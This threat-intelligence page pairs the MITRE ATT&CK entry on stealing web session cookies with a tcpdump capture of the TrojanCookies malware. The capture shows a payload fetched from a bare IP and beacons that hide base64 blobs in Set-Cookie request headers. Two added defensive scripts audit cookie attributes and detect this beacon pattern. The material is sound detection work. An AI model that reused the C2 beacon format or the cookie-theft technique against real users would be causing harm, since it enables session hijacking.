APT TrojanCookies Malware Traffic Sample Trojan PCAP Download



Steal Web Session Cookie

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the target's machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols.[1]

There are several examples of malware targeting cookies from web browsers on the local system.[2][3] There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.[4][5]

Once an adversary has acquired a valid cookie, they can then use the Web Session Cookie technique to log in to the corresponding web application with it.
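The long-lived, bearer-style nature of session cookies described above is something a service owner can limit with cookie attributes and lifetimes. The script below is an added example, not part of this ATT&CK entry or of any referenced project; it parses Set-Cookie headers as a server emits them and reports the weaknesses that make a stolen cookie more useful: missing Secure (cookie travels in cleartext and shows up in captures), missing HttpOnly (readable from script), SameSite absent or None, and a lifetime beyond a policy maximum. The policy threshold (MAX_LIFETIME), the fixed clock (NOW) and the sample headers are constructed assumptions.

```python
"""Audit Set-Cookie headers for attributes that limit the value of a stolen cookie.

Added example; not part of the original page or of MITRE ATT&CK.
Thresholds, clock and sample headers below are constructed for illustration.
"""
from datetime import datetime, timedelta, timezone

MAX_LIFETIME = timedelta(hours=12)  # assumed policy: session cookies expire within 12 h
NOW = datetime(2013, 1, 5, 22, 41, tzinfo=timezone.utc)  # fixed clock so results are repeatable


def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), value, attrs


def lifetime(attrs):
    """Remaining lifetime as a timedelta; None means a browser-session cookie
    (no Max-Age/Expires), whose validity then depends on the server's idle timeout."""
    if "max-age" in attrs:
        return timedelta(seconds=int(attrs["max-age"]))
    if "expires" in attrs:
        exp = datetime.strptime(attrs["expires"], "%a, %d %b %Y %H:%M:%S GMT")
        return exp.replace(tzinfo=timezone.utc) - NOW
    return None


def audit(header):
    """Return (cookie name, list of weaknesses) for one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(header)
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure: sent over plain HTTP, visible in network captures")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: readable by injected script")
    if "samesite" not in attrs or attrs["samesite"].lower() == "none":
        problems.append("SameSite absent or None: attached to cross-site requests")
    life = lifetime(attrs)
    if life is not None and life > MAX_LIFETIME:
        problems.append(f"lifetime {life} exceeds policy maximum {MAX_LIFETIME}")
    return name, problems


# Constructed sample headers: a weak configuration and its hardened form.
WEAK = "SESSIONID=3f2a9c0b7d; Path=/; Max-Age=2592000"
HARDENED = "SESSIONID=3f2a9c0b7d; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=28800"
LONG_EXPIRES = "SESSIONID=3f2a9c0b7d; Path=/; Secure; HttpOnly; SameSite=Lax; Expires=Sat, 05 Jan 2019 00:00:00 GMT"

if __name__ == "__main__":
    for h in (WEAK, HARDENED, LONG_EXPIRES):
        name, problems = audit(h)
        print(name, "->", problems or "ok")
```

The check is deliberately strict about SameSite=None: that value is legitimate for some cross-site flows, but it is also what makes a cookie ride along on requests a phishing proxy (such as the Evilginx 2 and Muraena setups mentioned below) induces, so it is worth a human look rather than a pass.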

ID: T1539

Sub-techniques: No sub-techniques

Tactic: Credential Access

Platforms: Google Workspace, Linux, Office 365, SaaS, Windows, macOS

Permissions Required: User

Contributors: Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)

Version: 1.2

Created: 08 October 2019

Last Modified: 28 July 2021


Procedure Examples

ID: G0016
Name: APT29
Description: APT29 has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users.
2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
2013-01-05 22:41:53.771571 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [.], ack 280, win 64240, length 0
E..(-]…..mu7.:…..P.D..A …sP………….
2013-01-05 22:41:54.094611 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [P.], seq 1:1461, ack 280, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…-^……u7.:…..P.D..A …sP…….HTTP/1.1 200 OK
Content-Length: 114696
Content-Type: application/x-zip-compressed
Last-Modified: Thu, 24 Jan 2013 07:08:57 GMT
Accept-Ranges: bytes
ETag: "36c67bad1facd1:1c6d3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 30 Jan 2013 03:34:42 GMT
2013-01-05 22:41:57.398529 IP 172.16.253.130.1093 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.E.P.`……P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AQ8cIykwOUBGTVRaZGpxd37VYTR4d1mOKAnsKi5caRjlbe8Dnh66ZuvW9XyoBCJGTSRWPigvIUHsIR3KjiXZNqeIjqyoUwJPSMohKy+8+p0ugEk2gnrQvSJKWfkuLamQov0ILFxX//BehMNEX3P4sOrSF4JKBvtaAQaBTA1/PaelJ17yqMkdURSqcR7snK6L7gAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:41:58.609637 IP 172.16.253.130.1094 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.F.P7.D…m.P….\..GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AS5FUmNzg5CdscHO3Oz5CRbgmGZDAAnR7DFrbz9E22Ec8Fm3TRQV0fMySmECZO4MJct0A/K6WUNPeWyWYN7e91aeoWH5nVS2DtVtnY7ZVqj5SBHaCmHn2Ipqxu5PTcJvpaTJYehJMefihOCyJgJjaFZDPOUi2c/I2sqYIh6vJk2YuTNwQtHwNjgstq58DxYTjgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:41:59.422085 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@………..D\D\.I..{"host_int": 356675228, "version": [1, 8], "displayname": "356675228", "port": 17500, "namespaces": [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:41:59.703740 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [S], seq 209564213, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…ok……)
.G.P.}.5….p…:1……….
2013-01-05 22:41:59.811449 IP 184.22.41.10.80 > 172.16.253.130.1095: Flags [S.], seq 2093017231, ack 209564214, win 64240, options [mss 1460], length 0
E..,-……`..)
…..P.G|….}.6`………….
2013-01-05 22:41:59.811507 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…or……)
.G.P.}.6|…P…….
2013-01-05 22:41:59.811859 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.G.P.}.6|…P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: Aej4BRIfLDZDUF1qd4GOm6V0pE/nx2gMQgXnTabLrDG/gIVTURAa6iAdP5+uybCFbWBsTi99Ceg0paBJIJJ8SwJ/jRmTSHDoupkThSRwTsNJkwR8wfyR8YV+1xD8iz+kzR1CtrfR7olzp2dsnp+Wgyu1WCjeo7bsMG4nGq6DHAyFi2qk/Rzh5YLoM+bwQN2+ZgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
 
2013-01-05 22:42:29.443499 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@..m……..D\D\.I..{"host_int": 356675228, "version": [1, 8], "displayname": "356675228", "port": 17500, "namespaces": [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:42:30.173010 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [S], seq 1965195895, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…oN……)
.P.Pu”.w….p….A……….
2013-01-05 22:42:30.280498 IP 184.22.41.10.80 > 172.16.253.130.1104: Flags [S.], seq 3239884347, ack 1965195896, win 64240, options [mss 1460], length 0
E..,-……G..)
…..P.P…;u”.x`………….
2013-01-05 22:42:30.280566 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…oU……)
.P.Pu”.x…<P…….
2013-01-05 22:42:30.280868 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…mp……)
.P.Pu”.x…<P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AR0uO0RRX2h1f4yZo7C9x9QYPVyZXtpP+RD9ajqe1y4uj2IpzAeer9zbGYcLK2X7whwmbN3qvn023RzcnGBgL95kqq62vc/yFd8TnWFxQRysDDYxTmW91Xdpjo8UWn8wB6m1AiWaS5Ya4e0WTCFlCE4Yep6yro43ijU8tUpocsHX5OK3zQ4s1Qb7TAIAuhdumAAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache
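The capture above gives a detection engineer two things to key on. The beacons to 184.22.41.10 are client requests carrying a Set-Cookie header, which is a response header a browser never sends, and its value is a long base64 blob; the first request fetches a .zip from a bare-IP Host. The script below is an added example, not part of the original capture post; it parses tcpdump -A style text and reports both patterns. The constructed sample reproduces the request portions of this page's capture with the binary packet bytes removed, plus one constructed benign request to show it is not flagged. The finding field names and the ENTROPY_MIN threshold are my own assumptions.

```python
"""Flag TrojanCookies-style beacons in tcpdump -A text output.

Added example; not part of the original capture post or of MITRE ATT&CK.
Two rules, both written from the traffic shown on this page:
  1. a client request carrying a Set-Cookie header (a *response* header)
     whose value is a long, high-entropy base64 blob;
  2. a .zip download from a Host that is a bare IP address.
"""
import math
import re
from collections import Counter

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): (?P<rest>.*)$"
)
REQUEST_RE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]$")
HEADER_RE = re.compile(r"^([A-Za-z-]+): (.*)$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")
BARE_IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
ENTROPY_MIN = 4.0  # assumed threshold, bits/char; ordinary cookie values sit well below


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for a single repeated symbol)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_packets(text):
    """Group tcpdump -A lines into (summary match, payload lines) per packet."""
    packets = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            packets.append((m, []))
        elif packets:
            packets[-1][1].append(line)
    return packets


def parse_request(lines):
    """Return (method, path, {header_lower: value}) if the payload is an HTTP request."""
    for i, line in enumerate(lines):
        r = REQUEST_RE.match(line)
        if r:
            headers = {}
            for h in lines[i + 1:]:
                hm = HEADER_RE.match(h)
                if not hm:
                    break  # blank line or body ends the header block
                headers[hm.group(1).lower()] = hm.group(2)
            return r.group(1), r.group(2), headers
    return None


def detect(text):
    """Run both rules over a tcpdump -A text dump; returns a list of findings."""
    findings = []
    for summary, lines in parse_packets(text):
        req = parse_request(lines)
        if req is None:
            continue
        _method, path, headers = req
        src, dst = summary.group("src"), summary.group("dst")
        host = headers.get("host", "")
        blob = headers.get("set-cookie")
        if blob and BASE64_RE.match(blob) and shannon_entropy(blob) >= ENTROPY_MIN:
            findings.append({"kind": "set-cookie-in-request", "src": src, "dst": dst,
                             "host": host, "entropy": round(shannon_entropy(blob), 2)})
        if path.lower().endswith(".zip") and BARE_IP_RE.match(host):
            findings.append({"kind": "zip-from-bare-ip", "src": src, "dst": dst,
                             "host": host, "path": path})
    return findings


# Constructed sample: request portions of this page's capture, binary bytes stripped,
# followed by one constructed benign request (TEST-NET-2 address) that must not fire.
SAMPLE = """\
2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
GET /indexs.zip HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: 117.55.241.58
Connection: Keep-Alive
2013-01-05 22:41:57.398529 IP 172.16.253.130.1093 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AQ8cIykwOUBGTVRaZGpxd37VYTR4d1mOKAnsKi5caRjlbe8Dnh66ZuvW9XyoBCJGTSRWPigvIUHsIR3KjiXZNqeIjqyoUwJPSMohKy+8+p0ugEk2gnrQvSJKWfkuLamQov0ILFxX//BehMNEX3P4sOrSF4JKBvtaAQaBTA1/PaelJ17yqMkdURSqcR7snK6L7gAA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
2013-01-05 22:41:59.422085 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
2013-01-05 22:43:10.000000 IP 172.16.253.130.1105 > 198.51.100.7.80: Flags [P.], seq 1:300, ack 1, win 64240, length 299: HTTP: GET /index.html HTTP/1.1
GET /index.html HTTP/1.1
Host: www.example.com
Cookie: sessionid=3f2a9c0b7d
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
"""

if __name__ == "__main__":
    for f in detect(SAMPLE):
        print(f)
```

Run it against the text form of a capture (`tcpdump -A -r file.pcap`) and triage what it prints; the rule is intentionally narrow so that it does not fire on real browsers sending a `Cookie:` header, and the entropy check keeps short, human-readable values out of the results.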

